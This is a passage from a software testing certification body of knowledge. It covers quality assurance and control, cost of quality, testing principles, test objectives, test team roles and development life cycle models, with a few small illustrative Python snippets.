professionals today. To aid in preparing for the certification exam, key definitions have been noted
at the beginning of sections as shown in Figure 1-1. It is suggested you create a separate vocabulary
list and write down the definitions as they are called out in the text. It is also a good practice to use
an Internet search engine to search the definitions and review other examples of those terms.
However, some variability in the definition of words may exist, so for the purpose of preparing for
the examination, a definition given in the STBOK is the correct usage as recognized on the
examination.
Appendix A of the STBOK is a glossary of software testing terms. However, learning them as used
in the appropriate context is the best approach.
1.2 Quality Basics

1.2.1 Quality Assurance Versus Quality Control

Quality assurance and quality control are distinct activities. This discussion explains the
critical difference between control and assurance, and how to recognize a Quality Control
practice from a Quality Assurance practice.
There are many “products” produced from the software development process in addition to
the software itself, including requirements, design documents, data models, GUI screens, and
programs. To ensure that these products meet both requirements and user needs, quality
assurance and quality control are both necessary.
Quality assurance is an activity that establishes and evaluates the processes that produce
products. If there is no need for process, there is no role for quality assurance. Quality
assurance is a staff function, responsible for implementing the quality plan defined through
the development and continuous improvement of software development processes. Quality
assurance activities in an IT environment would determine the need for, acquire, or help
install:
• System development methodologies
• Estimation processes
• System maintenance processes
• Requirements definition processes
• Testing processes and standards
Once installed, quality assurance would measure these processes to identify weaknesses, and
then correct those weaknesses to continually improve the process.
Quality control activities focus on identifying defects in the actual products produced. These
activities begin at the start of the software development process with reviews of requirements
and continue until all testing is complete.
It is possible to have quality control without quality assurance. For example, a test team may
be in place to conduct system testing at the end of development, regardless of whether the
organization has a quality assurance function in place.
The following statements help differentiate between quality control and quality assurance:
• Quality assurance helps establish processes.
• Quality assurance sets up measurement programs to evaluate processes.
• Quality assurance identifies weaknesses in processes and improves them.
• Quality assurance is a management responsibility, frequently performed by a staff
function.
• Quality assurance is concerned with the products across all projects where quality
control is product line focused.
• Quality assurance is sometimes called quality control over quality control because it
evaluates whether quality control is working.
• Quality assurance personnel should never perform quality control unless it is to
validate quality control.
• Quality control relates to a specific product or service.
• Quality control verifies whether specific attribute(s) are in, or are not in, a specific
product or service.
• Quality control identifies defects for the purpose of correcting defects.
Both quality assurance and quality control are separate and distinct from the
internal audit function. Internal Auditing is an independent appraisal activity
within an organization for the review of operations, and is a service to
management. It is a managerial control that functions by measuring and
evaluating the effectiveness of other controls.
There are five perspectives of quality – each of which should be considered as important to
the customer:
Peter R. Scholtes [1] introduces the contrast between effectiveness and efficiency. Quality
organizations must be both effective and efficient.
Patrick Townsend [2] examines quality in fact and quality in perception as shown in Table 1-1.
Quality in fact is usually the supplier's point of view, while quality in perception is the
customer's. Any difference between the former and the latter can cause problems between the
two.
An organization’s quality policy must define and view quality from their customer's
perspectives. If there are conflicts, they must be resolved.
1. Scholtes, Peter, The Team Handbook, Madison, WI, Joiner Associates, Inc., 1988, p. 2-6.
2. Townsend, Patrick, Commit to Quality, New York, John Wiley & Sons, 1986, p. 167.
The first gap is the producer gap. It is the gap between what was specified to be delivered,
meaning the documented requirements and internal IT standards, and what was actually
delivered. The second gap is between what the producer actually delivered compared to what
the customer expected.
A significant role of software testing is helping to close the two gaps. The IT quality function
must first improve the processes to the point where IT can produce the software according to
requirements received and its own internal standards. The objective of the quality function
closing the producer’s gap is to enable an IT function to provide consistency in what it can
produce. This is referred to as the “McDonald’s effect.” This means that when you go into any
McDonald’s in the world, a Big Mac should taste the same. It doesn’t mean that you as a
customer like the Big Mac or that it meets your needs but rather that McDonald’s has now
produced consistency in its delivered product.
To close the customer’s gap, the IT quality function must understand the true needs of the
user. This can be done by the following:
• Customer surveys
• JAD (joint application development) sessions – the producer and user come together
and negotiate and agree upon requirements
• More user involvement while building information products
• Implementing Agile development strategies
Continuous process improvement is necessary to close the user gap so that there is
consistency in producing software and services that the user needs. Software testing
professionals can participate in closing these “quality” gaps.
The common thread that runs through today's quality improvement efforts is the focus on the
customer and, more importantly, customer satisfaction. The customer is the most important
person in any process. Customers may be either internal or external. The question of customer
satisfaction (whether that customer is located in the next workstation, building, or country) is
the essence of a quality product. Identifying customers' needs in the areas of what, when, why,
and how is an essential part of process evaluation and may be accomplished only through
communication.
The internal customer is the person or group that receives the results (outputs) of any
individual's work. The outputs may include a product, a report, a directive, a communication,
or a service. Customers include peers, subordinates, supervisors, and other units within the
organization. To achieve quality the expectations of the customer must be known.
External customers are those using the products or services provided by the organization.
Organizations need to identify and understand their customers. The challenge is to understand
and exceed their expectations.
An organization must focus on both internal and external customers and be dedicated to
exceeding customer expectations.
There are many strategic and tactical activities that help improve software quality. Listed
below are several such activities that can help the IT development team and specifically the
quality function to improve software quality.
• Explicit software quality objectives: Making clear which qualities are most important
• Explicit quality assurance activities: Ensuring software quality is not just an
afterthought to grinding out ‘code’
• Testing strategy: Planning and conducting both static testing (reviews, inspections)
and dynamic testing (unit, integrations, system and user acceptance testing)
• Software engineering guidelines: Specifying recommendations/rules/standards for
requirements analysis, design, coding and testing
• Informal technical reviews: Reviewing specifications, design, and code alone or with
peers
• Formal technical reviews: Conducting formal reviews at well-defined milestones
(requirements/architecture, architecture/detailed design, detailed design/coding, and
coding/testing)
• External audits: Organizing technical reviews conducted by outside personnel, usually
commissioned by management
• Development processes: Using development processes with explicit risk management
• Change control procedures: Using explicit procedures for changing requirements,
design, and code; documenting the procedures and checking them for consistency
• Measurement of results: Measuring effects of quality assurance activities
The three categories of costs associated with producing quality products are:
• Prevention Costs
Resources required to prevent errors and to do the job right the first time. These
normally require up-front expenditures for benefits that will be derived later. This
category includes money spent on establishing methods and procedures, training
workers, acquiring tools, and planning for quality. Prevention resources are spent
before the product is actually built.
• Appraisal Costs
Resources spent to ensure a high level of quality in all development life cycle stages
which includes conformance to quality standards and delivery of products that meet
the user’s requirements/needs. Appraisal costs include the cost of in-process reviews,
dynamic testing, and final inspections.
• Failure Costs
All costs associated with defective products that have been delivered to the user and/or
moved into production. Failure costs can be classified as either “internal” failure costs
or “external” failure costs. Internal failure costs are costs that are caused by products
or services not conforming to requirements or customer/user needs and are found
before deployment of the application to production or delivery of the product to
external customers. Examples of internal failure costs are: rework, re-testing, delays
within the life cycle, and lack of certain quality factors such as flexibility. Examples of
external failure costs include: customer complaints, lawsuits, bad debt, losses of
revenue, and the costs associated with operating a Help Desk.
Collectively the Prevention Costs and Appraisal Costs are referred to as the “Costs of Control
(Costs of Conformance).” They represent the costs of “good quality.” Failure Costs are
referred to as the “Costs of Failure of Control (Costs of Nonconformance)” and represent the
costs of “poor quality.”
The iceberg diagram illustrated in Figure 1-4 is often used to depict how the more visible CoQ
factors make up only a portion of the overall CoQ costs. When viewing the cost of quality
from a broader vantage point the true costs are revealed.
The Cost of Quality will vary from one organization to the next. The majority of costs
associated with the Cost of Quality are associated with failure costs, both internal and
external. Studies have shown that on many IT projects the cost of quality can make up as
much as 50% of the overall costs to build a product. These studies have shown that of that
50%, 3% are Prevention Costs, 7% are Appraisal Costs, and 40% are Failure Costs.
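As a rough illustration of how those proportions translate into money, the sketch below applies the 3%/7%/40% split to a hypothetical project budget. Only the percentages come from the text; the budget figure and the Python form are assumptions added for illustration.

# A minimal, hypothetical illustration of the Cost of Quality split described above.
# Only the 3% / 7% / 40% proportions come from the text; the budget figure is invented.
def cost_of_quality(project_budget):
    prevention = 0.03 * project_budget  # prevention costs (methods, training, tools, planning)
    appraisal = 0.07 * project_budget   # appraisal costs (reviews, dynamic testing, inspections)
    failure = 0.40 * project_budget     # internal and external failure costs
    return prevention, appraisal, failure

prevention, appraisal, failure = cost_of_quality(1_000_000)
print(f"Prevention: {prevention:,.0f}")  # 30,000
print(f"Appraisal:  {appraisal:,.0f}")   # 70,000
print(f"Failure:    {failure:,.0f}")     # 400,000, the bulk of CoQ
print(f"Total CoQ:  {prevention + appraisal + failure:,.0f}")  # 500,000, i.e., 50% of budget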
The concept of “quality is free” goes to the heart of understanding the costs of quality. If you
can identify and eliminate the causes of problems early, you reduce rework, warranty costs, and
inspections; it logically follows that creating quality goods and services does not cost
money, it saves money.
The IT quality assurance group must identify the costs within these three categories, quantify
them, and then develop programs to minimize the totality of these three costs. Applying the
concepts of continuous testing to the systems development process can reduce the Cost of
Quality.
This section addresses the problem of identifying software quality factors that are in addition
to the functional, performance, cost, and schedule requirements normally specified for
software development. The fact that the goals established are related to the quality of the end
product should, in itself, provide some positive influence on the development process.
The software quality factors should be documented in the same form as the other system
requirements. Additionally, a briefing emphasizing the intent of the inclusion of the software
quality factors is recommended.
Figure 1-6 illustrates the Diagram of Software Quality Factors as described by Jim McCall.
McCall produced this model for the US Air Force as a means to help “bridge the gap”
between users and developers. He mapped the user view with the developer’s priority.
McCall identified three main perspectives for characterizing the quality attributes of a software
product. These perspectives are:
• Product Operation (the product’s operational characteristics)
• Product Revision (the product’s ability to undergo changes)
• Product Transition (the product’s adaptability to new environments)
In the process of correcting a defect, the correction process itself injects additional defects into
the application system.
Standard – Description
CMMI-Dev – A process improvement model for software development.
TMMi – A process improvement model for software testing.
ISO/IEC/IEEE 29119 – A set of standards for software testing.
ISO/IEC 25000:2005 – A standard for software product quality requirements and evaluation (SQuaRE).
ISO/IEC 12119 – A standard that establishes requirements for software packages and instructions on how to test a software package against those requirements.
IEEE 829 – A standard for the format of documents used in different stages of software testing.
IEEE 1061 – Defines a methodology for establishing quality requirements, and identifying, implementing, analyzing, and validating the process and product of software quality metrics.
IEEE 1059 – Guide for Software Verification and Validation Plans.
IEEE 1008 – A standard for unit testing.
IEEE 1012 – A standard for Software Verification and Validation.
IEEE 1028 – A standard for software inspections.
IEEE 1044 – A standard for the classification of software anomalies.
IEEE 1044-1 – A guide to the classification of software anomalies.
IEEE 830 – A guide for developing system requirements specifications.
IEEE 730 – A standard for software quality assurance plans.
IEEE 1061 – A standard for software quality metrics and methodology.
IEEE 12207 – A standard for software life cycle processes and life cycle data.
BS 7925-1 – A vocabulary of terms used in software testing.
BS 7925-2 – A standard for software component testing.
Testing is NOT:
A number of testing principles have been suggested over the past 40 years. These offer
general guidelines common for all types of testing.
• Testing shows presence of defects
The first principle states that testing can show that defects are present, but cannot
prove that there are no defects. In other words, testing reduces the probability of
undiscovered defects remaining in the software, but, even if no defects are found, it is
not proof of correctness.
• Exhaustive testing is impossible
Testing everything (all combinations of inputs and preconditions) is not feasible
except for the most trivial cases. This implies that instead of spending scarce resources
(both time and money) on exhaustive testing, organizations should use risk analysis
and priorities to focus their testing efforts.
• Early testing
Testing activities should start as early as possible in the software or system
development life cycle and should be focused on defined objectives.
• Defect clustering
Research shows that a small number of modules generally contain most of the defects
discovered during pre-release testing or are responsible for most of the operational
failures. This indicates that software defects are usually found in clusters.
• Pesticide paradox
If the same tests are repeated over and over again, their effectiveness reduces and
eventually the same set of test cases will no longer find any new defects. This is called
the “pesticide paradox.” To overcome this “pesticide paradox,” the test cases need to
be regularly reviewed and revised, and new and different tests need to be written to
exercise different parts of the software or system to potentially find more defects.
• Testing is context dependent
No single test plan fits all organizations and all systems. Testing needs to be done
differently in different contexts. For example, safety-critical software needs to be
tested differently from an e-commerce site.
• Absence-of-errors fallacy
Absence of errors does not mean that the software is perfect. Finding and fixing
defects is of no help if the system build is unusable and does not fulfill the users’ needs
and expectations
• Testing must be traceable to the requirements
Quality is understood as meeting customer requirements. One important principle for
testing, therefore, is that it should be related to the requirements; testing needs to
check that each requirement is met. You should, therefore, design tests for each
requirement and should be able to trace back your test cases to the requirements being
tested (a minimal sketch of such a traceability check follows this list).
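To make the traceability principle concrete, the sketch below maps each requirement to the test cases that cover it and flags any requirement with no tests. The requirement and test case identifiers are hypothetical; a real project would draw them from its requirements repository and test management tool.

# Hypothetical requirement-to-test-case traceability matrix.
# The identifiers are invented for illustration only.
traceability = {
    "REQ-001": ["TC-101", "TC-102"],
    "REQ-002": ["TC-103"],
    "REQ-003": [],  # no test cases yet: a coverage gap
}

# Flag any requirement that cannot be traced to at least one test case.
untested = [req for req, tests in traceability.items() if not tests]
if untested:
    print("Requirements without test cases:", ", ".join(untested))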
Let’s compare the manufacturing process of producing boxes of cereal to the process of
making software. We find that, as is the case for most food manufacturing companies, testing
each box of cereal produced is unnecessary. However, making software is a significantly
different process than making a box of cereal. Cereal manufacturers may produce 50,000
identical boxes of cereal a day, while each software process is unique. This uniqueness
introduces defects, thus making software testing necessary.
Without a formal division between development and test, an individual may be tempted to
improve the system structure and documentation, rather than allocate that time and effort to
the test.
Each of these factors will be discussed individually to explain how the role of testing in an IT
organization is determined.
With the introduction of the Certified Software Test Engineer (CSTE) certification program in
the early 1990’s, software testing began the long journey towards being recognized as a
profession with specialized skill sets and qualifications. Over the last two decades, some
organizations have come to appreciate that testing must be conducted throughout the
application life cycle and that new development frameworks such as Agile must be considered
if quality software products are to be delivered in today’s fast changing industry.
Unfortunately, while much progress has been made over the last 20+ years, many
organizations still have unstructured testing processes and leave the bulk of software testing as
the last activity in the development process.
The word “testing” conjures up a variety of meanings depending upon an individual’s frame
of reference. Some people view testing as a method or process by which they add value to the
development cycle; they may even enjoy the challenges and creativity of testing. Other people
feel that testing tries a person’s patience, fairness, ambition, credibility, and capability. Testing
can actually affect a person’s mental and emotional health if you consider the office politics
and interpersonal conflicts that are often present.
Some attitudes that have shaped a negative view of testing and testers are:
• Testers hold up implementation, FALSE
• Giving testers less time to test will reduce the chance that they will find defects,
FALSE
• Letting the testers find problems is an appropriate way to debug, FALSE
• Defects found in production are the fault of the testers, FALSE; and
• Testers do not need training; only programmers need training, FALSE!
Although testing is a process, it is very much a dynamic one in that the product and process
will vary with each application under test. There are several variables that
affect the testing process, including the development process itself, software risk, customer/
user participation, the testing process, the tester’s skill set, use of tools, testing budget and
resource constraints, management support, and morale and motivation of the testers. It is
obvious that the people side of software testing has long been ignored for the more process-
related issues of test planning, test tools, defect tracking, and so on.
Testers should perform a self-assessment to identify their own strengths and weaknesses as
they relate to people-oriented skills. They should also learn how to improve the identified
weaknesses, and build a master plan of action for future improvement. Essential testing skills
include test planning, using test tools (automated and manual), executing tests, managing
defects, risk analysis, test measurement, designing a test environment, and designing effective
test cases. Additionally, a solid vocabulary of testing is essential. A tester needs to understand
what to test, who performs what type of test, when testing should be performed, how to
actually perform the test, and when to stop testing.
The scope of testing is the extensiveness of the test process. A narrow scope may be limited to
determining whether or not the software specifications were correctly implemented. The
scope broadens as more responsibilities are assigned to software testers. Among the broader
scope of software testing are these responsibilities:
1. Finding defects early in the software development process, when they can be corrected
at significantly less cost than detecting them later in the software development process.
2. Removing defects of all types prior to the software going into production, when it is
significantly cheaper than when the software is operational.
In defining the scope of software testing each IT organization must answer the question,
“Why are we testing?”
The traditional view of the development life cycle places testing just prior to operation and
maintenance, as illustrated in Table 1-5. All too often, testing after coding is the only method
used to determine the adequacy of the system. When testing is constrained to a single phase
and confined to the later stages of development, severe consequences can develop. It is not
unusual to hear of testing consuming 50 percent of the project budget. All errors are costly,
but the later in the life cycle an error is found, the more costly it is. An
error discovered in the latter parts of the life cycle must be paid for four different times. The
first cost is developing the program erroneously, which may include writing the wrong
specifications, coding the system wrong, and documenting the system improperly. Second, the
system must be tested to detect the error. Third, the wrong specifications and coding must be
removed and the proper specifications, coding, and documentation added. Fourth, the system
must be retested to determine that it is now correct.
If lower cost and higher quality systems are the goals of the IT organization, verification must
not be isolated to a single phase in the development process but rather incorporated into each
phase of development.
Studies have shown that the majority of system errors occur in the requirements and design
phases. These studies show that approximately two-thirds of all detected system errors can be
attributed to errors made prior to coding. This means that almost two-thirds of the errors are
specified and coded into programs before they can be detected by validation (dynamic
testing).
The recommended testing process is presented in Table 1-5 as a life cycle chart showing the
verification activities for each phase. The success of conducting verification throughout the
development cycle depends upon the existence of clearly defined and stated products to be
produced at each development stage. The more formal and precise the statement of the
development product, the more amenable it is to the analysis required to support verification.
A more detailed discussion of Life Cycle Testing is found later in this skill category.
Variability in test planning is a major factor affecting software testing today. A plan should be
developed that defines how testing should be performed (see Skill Category 4). With a test
plan, testing can be considered complete when the plan has been accomplished. The test plan
is a contract between the software stakeholders and the testers.
Anything that inhibits the tester’s ability to fulfill their responsibilities is a constraint.
Constraints include:
• Limited schedule and budget
• Lacking or poorly written requirements
• Limited tester skills
• Lack of independence of the test team
Budget and schedule constraints may limit the ability of a tester to complete their test plan.
Embracing a life cycle testing approach can help alleviate budget and schedule problems.
The cost of defect identification and correction increases exponentially as the project
progresses. Figure 1-7 illustrates how costs dramatically increase the later in the life cycle a
defect is found. A defect discovered during requirements and design is the cheapest to fix. So, let’s say
it costs x; based on this, a defect corrected during the system test phase costs 10x to fix. A
defect corrected after the system goes into production costs 100x. Clearly, identifying and
correcting defects early is the most cost-effective way to reduce the number of production
level defects.
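As a quick illustration of the arithmetic above, the following sketch (Python; the 1x/10x/100x multipliers are the illustrative ratios from this discussion and the defect count is hypothetical) compares the relative cost of correcting the same defects at different points in the life cycle.

    # Relative cost of correcting defects, using the illustrative 1x/10x/100x ratios.
    relative_cost = {"requirements/design": 1, "system test": 10, "production": 100}

    defects = 50  # hypothetical number of defects to be corrected
    for phase, multiplier in relative_cost.items():
        print(f"Correcting {defects} defects during {phase}: {defects * multiplier} cost units")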
Testing should begin during the first phase of the life cycle and continue throughout the life
cycle. It’s important to recognize that life cycle testing is essential to reducing the overall cost
of producing software.
Let’s look at the economics of testing. One information services manager described testing in
the following manner, “too little testing is a crime – too much testing is a sin.” The risk of
under testing is directly translated into system defects present in the production environment.
The risk of over testing is the unnecessary use of valuable resources in testing computer
systems where the cost of testing far exceeds the value of detecting the defects.
Most problems associated with testing occur from one of the following causes:
• Failing to define testing objectives
• Testing at the wrong phase in the life cycle
• Using ineffective test techniques
The cost-effectiveness of testing is illustrated in Figure 1-8. As the cost of testing increases,
the number of undetected defects decreases. The left side of the illustration represents an
under test situation in which the cost of testing is less than the resultant loss from undetected
defects.
At some point, the two lines cross and an over test condition begins. In this situation, the cost
of testing to uncover defects exceeds the losses from those defects. A cost-effective
perspective means testing until the optimum point is reached, which is the point where the
value received from testing no longer exceeds the cost of testing.
Few organizations have established a basis to measure the effectiveness of testing. This makes
it difficult to determine the cost effectiveness of testing. Without testing standards, the
effectiveness of the process cannot be evaluated in sufficient detail to enable the process to be
measured and improved.
The use of a standardized testing methodology provides the opportunity for a cause and effect
relationship to be determined and applied to the methodology. In other words, the effect of a
change in the methodology can be evaluated to determine whether that effect resulted in a
smaller or larger number of defects being discovered. The establishment of this relationship is
an essential step in improving the test process. The cost-effectiveness of a testing process can
be determined when the effect of that process can be measured. When the process can be
measured, it can be adjusted to improve its cost-effectiveness for the organization.
If requirements are lacking or poorly written, then the test team must have a defined method
for uncovering and defining test objectives.
A test objective is simply a testing “goal.” It is a statement of what the test team or tester is
expected to accomplish or validate during a specific testing activity. Test objectives, usually
defined by the test manager or test team leader during requirements analysis, guide the
development of test cases, test scripts, and test data. Test objectives enable the test manager
and project manager to gauge testing progress and success, and enhance communication both
within and outside the project team by defining the scope of the testing effort.
Each test objective should contain a statement of the objective, and a high-level description of
the expected results stated in measurable terms. The users and project team must prioritize the
test objectives. Usually the highest priority is assigned to objectives that validate high priority
or high-risk requirements defined for the project. In cases where test time is short, test cases
supporting the highest priority objectives would be executed first.
Test objectives can be easily derived from using the system requirements documentation, the
test strategy, and the outcome of the risk assessment. A couple of techniques for uncovering
and defining test objectives, if the requirements are poorly written, are brainstorming and
relating test objectives to the system inputs, events, or system outputs. Ideally, there should be
fewer than 100 high-level test objectives for all but the very largest systems. Test objectives are
not simply a restatement of the system’s requirements, but the actual way the system will be
tested to assure that the system objective has been met. Completion criteria define the success
measure for the tests.
As a final step, the test team should perform quality control on the test objective process, either
by using a checklist or worksheet to ensure that the process for setting test objectives was
followed, or by reviewing the objectives with the system users.
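To make the idea of measurable, prioritized test objectives concrete, the sketch below shows one possible way to record them (purely illustrative; the STBOK does not prescribe a format or tooling, and the objectives shown are hypothetical) so that test cases supporting the highest-priority objectives are executed first when test time is short.

    from dataclasses import dataclass

    @dataclass
    class TestObjective:
        objective: str        # statement of the testing goal
        expected_result: str  # completion criteria stated in measurable terms
        priority: int         # 1 = highest (validates high-priority or high-risk requirements)

    objectives = [
        TestObjective("Validate order totals against the published pricing rules",
                      "100% of sampled orders are priced correctly", priority=1),
        TestObjective("Confirm the nightly batch completes within its processing window",
                      "Batch run finishes in under 4 hours", priority=2),
    ]

    # Execute test cases supporting the highest-priority objectives first.
    for obj in sorted(objectives, key=lambda o: o.priority):
        print(obj.priority, obj.objective, "->", obj.expected_result)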
Testers should be competent in all skill areas defined in the Software Testing Body of
Knowledge (STBOK). Lack of the skills needed for a specific test assignment constrains the
ability of the testers to effectively complete that assignment. Tester skills will be discussed in
greater detail in Skill Category 2.
The roles and reporting structure of test resources differs across and within organizations.
These resources may be business or systems analysts assigned to perform testing activities, or
they may be testers who report to the project manager. Ideally, the test resources will have a
reporting structure independent from the group designing or developing the application in
order to assure that the quality of the application is given as much consideration as the
development budget and timeline.
Misconceptions abound regarding the skill set required to perform testing, including:
• Testing is easy
While much of this discussion focuses on the roles and responsibilities of an independent test
team, it is important to note that the benefits of independent testing can be seen in the unit
testing stage. Often, successful development teams will have a peer perform the unit testing
on a program or class. Once a portion of the application is ready for integration testing, the
same benefits can be achieved by having an independent person plan and coordinate the
integration testing.
Where an independent test team exists, they are usually responsible for system testing, the
oversight of acceptance testing, and providing an unbiased assessment of the quality of an
application. The team may also support or participate in other phases of testing as well as
executing special test types such as performance and load testing.
An independent test team is usually comprised of a test manager or team leader and a team of
testers. The test manager should join the team no later than the start of the requirements
definition stage. Key testers may also join the team at this stage on large projects to assist with
test planning activities. Other testers can join later to assist with the creation of test cases and
scripts, and right before system testing is scheduled to begin.
The test manager ensures that testing is performed, that it is documented, and that testing
techniques are established and developed. They are responsible for ensuring that tests are
designed and executed in a timely and productive manner, as well as:
• Test planning and estimation
• Designing the test strategy
• Reviewing analysis and design artifacts
• Chairing the Test Readiness Review
• Managing the test effort
• Overseeing acceptance tests
Other testers joining the team will primarily focus on test execution, defect reporting, and
regression testing. These testers may be junior members of the test team, users, marketing or
product representatives.
The test team should be represented in all key requirements and design meetings including:
• JAD or requirements definition sessions
• Risk analysis sessions
• Prototype review sessions
They should also participate in all inspections or walkthroughs for requirements and design
artifacts.
3. Kal Toth, Intellitech Consulting Inc. and Simon Fraser University; list is partially created from lecture notes: Software Engineering Best Practices, 1997.
The Software Engineering Institute (SEI) at Carnegie Mellon University4 points out that with
Ad-hoc Process Models, “process capability is unpredictable because the software process is
constantly changed or modified as the work progresses. Schedules, budgets, functionality, and
product quality are generally (inconsistent). Performance depends on the capabilities of
individuals and varies with their innate skills, knowledge, and motivations. There are few
stable software processes in evidence, and performance can be predicted only by individual
rather than organizational capability.”5
7. Mark C. Paulk, Bill Curtis, Mary Beth Chrissis, and Charles V. Weber, "Capability Maturity Model
for Software, Version 1.1," Software Engineering Institute, February 1993, p 18.
There are a variety of potential deliverables from each life cycle phase. The primary
deliverables for each Waterfall phase are shown in Table 1-6 along with “What is tested” and
“Who performs the testing.”
Although the Waterfall Model has been used extensively over the years in the production of
many quality systems, it is not without its problems. Criticisms fall into the following
categories:
• Real projects rarely follow the sequential flow that the model proposes.
• At the beginning of most projects there is often a great deal of uncertainty about
requirements and goals, and it is therefore difficult for customers to identify these
criteria on a detailed level. The model does not accommodate this natural uncertainty
very well.
• Developing a system using the Waterfall Model can be a long, painstaking process that
does not yield a working version of the system until late in the process.
1.6.5 V-Model
The V-Model is considered an extension of the Waterfall Model. The purpose of the “V”
shape is to demonstrate the relationships between each phase of specification development
and its associated dynamic testing phase. This model clearly shows the inverse relationship
between how products move from high level concepts to detailed program code; then,
dynamic testing begins at the detailed code phase and progresses to the high level user
acceptance test phase.
On the left side of the “V,” often referred to as the specifications side, verification test
techniques are employed (to be described later in this skill category). These verification tests
test the interim deliverables and detect defects as close to point of origin as possible. On the
right hand side of the “V,” often referred to as the testing side, validation test techniques are
used (described later in this skill category). Each validation phase tests the corresponding
specification phase to validate that the specification at that level has been rendered
into quality executable code.
The V-Model enables teams to significantly increase the number of defects identified and
removed during the development life cycle by integrating verification tests into all stages of
development. Test planning activities are started early in the project, and test plans are
detailed in parallel with requirements. Various verification techniques are also utilized
throughout the project to:
• Verify evolving work products
Regardless of the development methodology used, understanding the V-model helps the tester
recognize the dependence of related phases within the life cycle.
This allows the development team to demonstrate results earlier on in the process and obtain
valuable feedback from system users. Often, each iteration is actually a mini-Waterfall
process with the feedback from one phase providing vital information for the design of the
next phase. In a variation of this model, the software products which are produced at the end
of each step (or series of steps) can go into production immediately as incremental releases.
The user community needs to be actively involved throughout the project. Even though this
involvement is a positive for the project, it is demanding on the time of the staff and can cause
project delays.
Informal requests for improvement after each phase may lead to confusion; a controlled
mechanism for handling substantive requests needs to be developed.
8. Kal Toth, Intellitech Consulting Inc. and Simon Fraser University, from lecture notes: Software
Engineering Best Practices, 1997.
The Iterative Model can lead to “scope creep,” since user feedback following each phase may
lead to increased customer demands. As users see the system develop, they may realize the
potential of other system capabilities which would enhance their work.
1.6.8.1 Prototyping
The Prototyping Model was developed on the assumption that it is often difficult to know all
of your requirements at the beginning of a project. Typically, users know many of the
objectives that they wish to address with a system, but they do not know all the nuances of the
data, nor do they know the details of the system features and capabilities. The Prototyping
Model allows for these circumstances and offers a development approach that yields results
without first requiring all the information.
When using the Prototyping Model, the developer builds a simplified version of the proposed
system and presents it to the customer for consideration as part of the development process.
The customer in turn provides feedback to the developer, who goes back to refine the system
requirements to incorporate the additional information. Often, the prototype code is thrown
away and entirely new programs are developed once requirements are identified.
There are a few different approaches that may be followed when using the Prototyping Model:
• Creation of the major user interfaces without any substantive coding in the
background in order to give the users a “feel” for what the system will look like
• Development of an abbreviated version of the system that performs a limited subset of functions
• Development of a paper system (depicting proposed screens, reports, relationships, etc.)
• Use of an existing system or system components to demonstrate some functions that
will be included in the developed system9
Criticisms of the Prototyping Model generally fall into the following categories:
• Prototyping can lead to false expectations. Prototyping often creates a situation where
the customer mistakenly believes that the system is “finished” when in fact it is not.
More specifically, when using the Prototyping Model, the pre-implementation
versions of a system are really nothing more than one-dimensional structures. The
necessary, behind-the-scenes work such as database normalization, documentation,
testing, and reviews for efficiency have not been done. Thus the necessary
underpinnings for the system are not in place.
• Prototyping can lead to poorly designed systems. Because the primary goal of
Prototyping is rapid development, the design of the system can sometimes suffer
because the system is built in a series of “layers” without a global consideration of the
integration of all other components. While initial software development is often built
to be a “throwaway,” attempting to retroactively produce a solid system design can
sometimes be problematic.
phase where the user still continues to participate. At this time, traditional phases of coding,
unit, integration, and system test take place. The four phases of RAD are:
3. Construction phase
4. Cutover phase
10. Frank Kand, “A Contingency Based Approach to Requirements Elicitation and Systems Development,” London School of Economics, J. System Software 1998; 40: pp. 3-6.
11. Linda Spence, University of Sunderland, “Software Engineering,” available at http://osiris.sunderland.ac.uk/rif/linda_spence/HTML/contents.html
12. Kal Toth, Intellitech Consulting Inc. and Simon Fraser University, from lecture notes: Software
Engineering Best Practices, 1997
The risk assessment component of the Spiral Model provides both developers and customers
with a measuring tool that earlier Process Models did not have. The measurement of risk is a
feature that occurs every day in real-life situations, but (unfortunately) not as often in the
system development industry. The practical nature of this tool helps to make the Spiral Model
a more realistic Process Model than some of its predecessors.
Within the Reuse Model, libraries of software modules are maintained that can be copied for
use in any system. These components are of two types: procedural modules and database
modules.
When building a new system, the developer will “borrow” a copy of a module from the
system library and then plug it into a function or procedure. If the needed module is not
available, the developer will build it, and store a copy in the system library for future usage. If
the modules are well engineered, the developer can implement them with minimal changes.
A general criticism of the Reuse Model is that it is limited for use in object-oriented
development environments. Although this environment is rapidly growing in popularity, it is
currently used in only a minority of system development applications.
Our highest priority is to satisfy the customer through early and continuous delivery
of valuable software.
Business people and developers must work together daily throughout the project.
Build projects around motivated individuals. Give them the environment and support
they need, and trust them to get the job done.
The most efficient and effective method of conveying information to and within a
development team is face-to-face conversation.
The best architectures, requirements, and designs emerge from self-organizing teams.
13. Kent Beck, Mike Beedle, Arie van Bennekum, Alistair Cockburn, Ward Cunningham, Martin
Fowler, James Grenning, Jim Highsmith, Andrew Hunt, Ron Jeffries, Jon Kern, Brian Marick, Rob-
ert C. Martin, Steve Mellor, Ken Schwaber, Jeff Sutherland, Dave Thomas
At regular intervals, the team reflects on how to become more effective, then tunes
and adjusts its behavior accordingly14
14. 2001, Per the above authors this declaration may be freely copied in any form, but only in its
entirety through this notice.
development cycles lasting from one to three weeks will often see twice daily
integration activity.
• Paired Programming: To obtain the benefits of reviews and inspections, as well as
to facilitate the dispersion of the knowledge base, programmers work in pairs. The
pairs may change partners often to promote the collective ownership of code. This is
also supported by the strict adherence to a set of uniform coding standards that makes
code understandable and modifiable by any experienced team member.
• Onsite Customer: One of the major issues addressed by the Agile approach is the
need for continuous involvement on the part of the intended product user or a
designated representative. This individual is a part of the team and co-located, making
access a matter of walking across the room. The onsite requirement prevents delays
and confusion resulting from the inability to access the customer or business partner at
critical times in the development process. It also addresses the testing and
requirements issue.
Agile development teams are generally small; Kent Beck15 suggests 10 or fewer. Projects
requiring more people should be broken down into teams of the recommended size. Beck’s
suggestion has led people to think that Agile only works well for small projects, and it often
excels in this area. Many organizations are experimenting with the use of Agile on larger
projects; in fact, Beck’s original project was very large.
One of the key “efficiencies” achieved through the use of Agile methodologies is the
elimination of much of the documentation created by the traditional processes. The intent is
for programs to be self-documenting with extensive use of commentary.
This lack of documentation is one of the drawbacks for many organizations considering Agile,
especially those whose products impact the health and safety of others. Large, publicly traded
corporations involved in international commerce are finding the lack of external
documentation can cause problems when complying with various international laws that
require explicit documentation of controls on financial systems.
Agile development is less attractive in organizations that are highly structured with a
“command and control” orientation. There is less incentive and less reward for making the
organizational and cultural changes required for Agile when the environment exists for
developing a stable requirements base.
This approach allows the organization to respond rapidly to a crisis or opportunity by quickly
deploying an entry level product and then ramping up the functionality in a series of iterations.
Once the initial result has been achieved, it is possible to either continue with the Agile
